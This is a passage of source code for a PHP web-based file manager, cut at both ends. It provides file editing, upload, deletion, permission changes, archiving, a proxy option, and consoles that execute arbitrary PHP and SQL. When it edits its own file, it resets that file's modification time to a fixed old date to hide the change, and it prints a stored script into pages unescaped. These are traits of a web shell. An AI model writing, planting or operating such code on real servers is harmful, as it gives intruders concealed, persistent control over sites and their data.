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"); } .file { background-image: url("data:image/png;base64,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"); } <?=fm_home_style()?> .img { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII="); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <script src="https://cdn.jsdelivr.net/gh/Den1xxx/EditArea@master/edit_area/edit_area_full.js"></script> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="25" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <script language="Javascript" type="text/javascript"> document.addEventListener('DOMContentLoaded', function() { editAreaLoader.init({ id: "newcontent" ,display: "later" ,start_highlight: true ,allow_resize: "both" ,allow_toggle: true ,word_wrap: true ,language: "ru" ,syntax: "<?=pathinfo($_REQUEST['edit'], PATHINFO_EXTENSION)?>" ,toolbar: "search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help" ,syntax_selection_allow: "css,html,js,php,python,xml,c,cpp,sql,basic,pas" }); }); </script> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_POST['search_recursive'])) { ini_set('max_execution_time', '0'); $search_data = find_text_in_files($_POST['path'], $_POST['mask'], $_POST['search_recursive']); if(!empty($search_data)) { $msg .= __('Found in files').' ('.count($search_data).'):<br>'; foreach ($search_data as $filename) { $msg .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a> '; } } else { $msg .= __('Nothing founded'); } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' 